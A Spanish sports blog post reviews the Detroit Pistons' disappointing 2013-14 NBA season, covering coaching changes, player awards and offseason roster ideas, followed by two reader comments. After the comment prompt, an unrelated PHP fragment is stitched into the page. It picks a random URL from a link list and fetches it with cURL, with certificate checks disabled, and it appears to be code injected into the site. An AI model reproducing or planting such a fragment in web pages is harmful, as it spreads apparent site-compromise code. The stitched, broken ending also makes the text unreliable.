Detroit Pistons: Muy deficiente

10 de July de 2014 por rumbero

En este mundo hay distintas clases de optimistas. Existen los que creen que Ricky Rubio algún año alcanzará el 40% en TC, los que confían en que los Knicks fichen finalmente a un interior que no sea un pufo, o incluso gente que espera ver a Popovich, Duncan y Leonard sonriendo a la vez en una misma toma de TV… Pero por encima de todos ellos está el que escribió el análisis de los Pistons de la pasada temporada: 45 victorias, sextos en el Este, Cheeks encontrándole un hueco a Josh Smith, una sustancial mejora defensiva… Ni Sandro Rey falla tanto.

La temporada ha sido un desastre se mire por donde se mire. Joe Dumars (gastando la que sería su última bala) intentó construir un equipo que volviera a pelear un puesto de PO después de tantos años pero a la hora de la verdad se ha quedado en 29 victorias. Aguantaron decentemente hasta finales de diciembre, ganando incluso partidos a Miami, Indiana, Chicago y Brooklyn pero a partir de ahí llegó el desastre. Pájaras y/o bajadas de brazos en los últimos cuartos, una de las peores defensas de toda la liga, una incapacidad tremenda para meter tiros más allá de 3 metros y 4 victorias en 15 partidos. Ante tal inoperancia, Maurice Cheeks salía de la franquicia a principios de febrero con un récord de 21-29 y la sensación de que no había sido capaz de acoplar las piezas ni definir un estilo de juego. Lo sustituía el interino John Loyer (supuesto especialista defensivo) que acabaría la temporada con la asombrosa cifra de 8 victorias en 30 partidos. A la calle también. 

Ninguno de los dos entrenadores, ya sea por presiones desde los despachos o problemas de ego en el banquillo, fue capaz de atajar el mayor y más visible problema de los Pistons durante toda la temporada: la convivencia de Josh Smith, Greg Monroe y Andre Drummond en un mismo quinteto. Eso  implicaba (por una cuestión de aprovechamiento del espacio) alejar al ex de los Hawks de la canasta, lo que es una mala notícia por sí sola. Si le añadimos que el resto del equipo fue incapaz durante toda la temporada de tirar con cierta consistencia desde la media/larga distancia nos encontramos con un problema mayúsculo el día que la pareja interior no se combina para meter 40 puntos.

¿Pero tener un frontcourt así al menos debería compensar en el apartado defensivo convirtiendo la zona en un sitio inexpugnable, no? Pues tampoco. Rebotes los que quérais. Estando por ahí Drummond que te coje 20 en un partido ya lo tienes. Otra cosa son las verbenas defensivas que se han montado en la pintura, provocando un desajuste en el perímetro y haciendo que los Pistons permitieran 104.7 puntos por partido y un 47% de FG en el rival (cuarto peor equipo en ambos apartados de toda la liga).

Del backcourt no podemos hablar mucho mejor. Temporada gris de Brandon Jennings a la que hay que añadir que prácticamente no hemos podido ver a Chauncey Billups ayudando en la dirección. La edad no perdona. Eso sí, al menos hemos visto un buen final de temporada de Rodney “quiero contratazo” Stuckey y los 3 o 4 buenos partidos de rigor por temporada de Will Bynum. A Kyle Singler y Kentavious Caldwell-Pope les podríamos dar un aprobado, ni que sea por actitud, pero les falta ese plus para poder ocupar con garantías sus respectivas posiciones.

Resumiendo, todo lo que podía ir mal ha ido mal. Un head coach que no ha dado la talla, dos jugadores franquicia de equipos asiduos a los playoffs del Este que no han rendido como se esperaba, problemas de actitud y de juego y un largo camino por recorrer cuando se pretendía tener un equipo competitivo desde el día 1. Parece difícil que las cosas puedan ir a peor pero con los Pistons nunca se sabe. No está Dumars eso sí, y llega Stan Van Gundy. Esa notícia ya debería ser suficiente como para que los seguidores de los Pistons lloren de alegría. Habrá que confiar en la buena cabeza de SVG y en que tarde o temprano los Pistons volverán a encontrar el camino que perdieron hace ya demasiados años. Hope for Detroit vol II.

PREMIOS

MVP: Con 20 años y solo dos temporadas en la liga, Andre Drummond ha demostrado que tiene un techo muy alto. 13.5 ppp – 13.2 rpp – 1.6 tpp, segundo máximo reboteador de la liga y un bonito 62.3% FG con más de 750 tiros intentados, números que disipan las dudas que había sobre su adaptación a la NBA. Con el físico que gasta el angelito ya tiene la mitad de faena hecha para convertirse en uno de los centers más dominantes de toda la NBA pero debe seguir mejorando en sus movimientos cerca del aro. Le podríamos pedir también que mejorará su alarmante porcentaje de TL (42%) pero parece algo complicado. El Hack-a-X tiene heredero.

Rookie: No nos queda mucho donde elegir. A Luigi Datome, Tony Mitchell y Peyton Siva los hemos visto más bien poco gracias a las caóticas rotaciones de Cheeks y Loyer. Así que nos quedamos con Kentavious Caldwell-Pope. Venía con fama de gran tirador y lo cierto es que ha promediado un triste 31.9% desde el triple. Por otro lado ha demostrado potencial para convertirse en un gran defensor y ha disfrutado de minutos para curtirse en su primer año. Si mejora su aportación ofensiva puede convertirse en un jugador de rol importante en estos Pistons

Sorpresa: Difícil encontrar a un candidato para esta sección. Sólo se me ocurre destacar “el curioso caso de Brandon Jennings”. En su peor campaña anotadora desde que llegó a la NBA ha asistido más que nunca promediando 7,6 por partido. Sorprende sin embargo que haya tenido tantos problemas en la anotación cuando venía siendo su faceta más destacada hasta el momento. Sus 15.5 ppp – 7.6 app lo han convertido en uno de los menos señalados dentro de la franquicia. Algunos apuntan que su juego se ha visto arrastrado por los innumerables problemas dentro del equipo pero da la sensación que siempre estamos igual con el amigo Brandon. Un año más, un año menos.

Decepción: Aquí nos sobrarían candidatos pero vamos a centrarnos en dos nombres. Por un lado hay que señalar a Maurice Cheeks. Ser el primer entrenador despedido de la temporada no habla muy bien a su favor. Contaba con una plantilla de grandes nombres y fracasó en una de las peores conferencias Este que se recuerdan. Problemas con jugadores, incapaz de imponer un estilo propio al equipo, errático en las rotaciones… Nada bueno a destacar.

Por otro lado muchas miradas apuntan a Josh Smith y su contrato de 54 millones. Venía para liderar un proyecto joven y dar un salto cualitativo al equipo pero se ha quedado bastante lejos de ese objetivo. A Josh no le gusta demasiado pegarse en la pintura y más si ya hay dos grandotes en el equipo que puedan hacerlo. El prefiere jugar de alero y tirarse 4 triples por partido aunque no supere el 26.5% de acierto. Ese alejamiento de la canasta ha provocado además un descenso en el apartado reboteador y taponador y que hayamos visto una versión gris de su defensa. Mala temporada para un jugador al que siempre hemos querido ver en un All-Star.

Esfuerzo en vano: Poco hemos hablado de Greg Monroe y este podría ser un buen apartado para hacerlo. Otra temporada por encima de los 15 puntos y 9 rebotes en un año en el que se ha tenido que adaptar a la posición de ala-pívot con la irrupción de Drummond. No se pueden poner muchas pegas a su rendimiento pero la explosión de Dru lo ha puesto en una posición complicada dentro de la franquicia. No ha acabado de dar ese salto en su progresión, la presencia de Smith afecta directamente a la nueva composición del frontcourt y además es agente libre restringido este verano. Veremos que pasa con él.

Jugando a GM

Parecía que nunca llegaría el día, pero señores, Rodney Stuckey y Charlie Villanueva acaban contrato. Me imagino a Van Gundy en su despacho, copa de Bourbon en mano, mirando el retrato de Dumars cuál Felipe VI que aún cuelga de la pared, con el Sexual Healing de fondo y soñando en cómo dilapidar los 17 millones que liberan. Una gozada. Pero antes que eso, hay que abordar el punto fundamental que debe desencadenar el resto de movimientos de los Pistons este verano, leáse, ¿que hacemos con Monroe?

Es una situación complicada ya que existen diversos escenarios de negociación. No parece probable que vayan a negociar con él una extensión de contrato. Cuadrar salarios después con los contratos de Jennings, Smith y la futura renovación de Drummond puede ser un problemón de los que ya conocen en Detroit. Buscar un sign and trade sería una buena opción ya que equipos interesados no van a faltar. Los Blazers podrían ser uno de ellos y meter en el pack a Wesley Matthews + Thomas Robinson + cosas. La última opción es que vengan los Lakers con una mega oferta que no va a ser igualada y por la cuál Monroe volará del nido.

A todo esto nos sigue quedando muy cojo el puesto de alero, y encontrar uno de nivel parece complicado tal y como está el mercado. Nombres como Luol Deng o Chandler Parsons parecen difíciles. Nuestro hombre podría ser Trevor Ariza pero con su gran campaña con los Wizards nos va a salir caro también. De no poder ser, habrá que bajar el listón y probar con nombres como el de Alan Anderson, que podría venir bien para cubrir las posiciones de 2 y 3.

Finalmente y después de no ejercer la Team Option con Billups (feo) habrá que buscar un base suplente de garantías. Siva sigue estando verde y el rookie drafteado en el puesto #38, Spencer Dinwiddie, viene de una grave lesión de rodilla y no parece que le vayamos a ver demasiado esta temporada. Jugadores como Kirk Hinrich, Steve Blake o Mario Chalmers podrían resultar útiles. A partir de aquí y con los deberes hechos, algún veterano a buen precio para apuntalar la posición de center tampoco nos vendría mal.

Así pues nos quedaría la siguiente plantilla:

Base: Jennings, Chalmers, Dinwiddie.
Escolta: Matthews, KCP, Bynum.
Alero: Ariza/Anderson, Singler, Datome
Ala-Pívot: Smith, Robinson, Jerebko
Pívot: Drummond, Harrelson.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Muy buen texto, rumbero.

    A mí el “Hope for Detroit vol II”, que creí posible con la llegada de SVG, se me derrumbó un poco al ver la millonada que le daban a Jodie Meeks. Una franquicia que ha pagado tan caro el haber sobrepagado jugadorcillos de medio pelo no puede comenter el mismo error a la primera de cambio. Aun así, SVG tiene material para trabajar, para hacer una plantilla muy competitiva en el este, para mejorar mediante traspasos. Yo soy muy anti Josh Smith, cada año más, y me pareció un error de bulto traerlo a un equipo con dos interiores del nivel de Drummond & Monroe. Ahora tienen que optar: Josh o Monroe. Incluso traspasar a ambos y buscar un 3 netamente exterior y un 4 de buena mano que pueda hacer el papel que hacían Ryan Anderson y Rashard Lewis en los Magic de Van Gundy.

      Citar

  2. rumbero dice:
    #2

    MagicJohnson32:
    Muy buen texto, rumbero.

    A mí el “Hope for Detroit vol II”, que creí posible con la llegada de SVG, se me derrumbó un poco al ver la millonada que le daban a Jodie Meeks. Una franquicia que ha pagado tan caro el haber sobrepagado jugadorcillos de medio pelo no puede comenter el mismo error a la primera de cambio. Aun así, SVG tiene material para trabajar, para hacer una plantilla muy competitiva en el este, para mejorar mediante traspasos. Yo soy muy anti Josh Smith, cada año más, y me pareció un error de bulto traerlo a un equipo con dos interiores del nivel de Drummond & Monroe. Ahora tienen que optar: Josh o Monroe. Incluso traspasar a ambos y buscar un 3 netamente exterior y un 4 de buena mano que pueda hacer el papel que hacían Ryan Anderson y Rashard Lewis en los Magic de Van Gundy.

    El análisis lo terminé un par de días antes de lo de Meeks. Seguro que hubiera sonado menos esperanzador de haberlo acabado después. Parece mentira que precisamente Detroit no aprenda de este tipo de contratos, pero como dices les queda margen para acabar montando un buen equipo. La clave es lo que decidan hacer con Monroe. Ahora se habla de un contrato sobre los 60 millones en 5 años y el interés de colocar a Smith.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>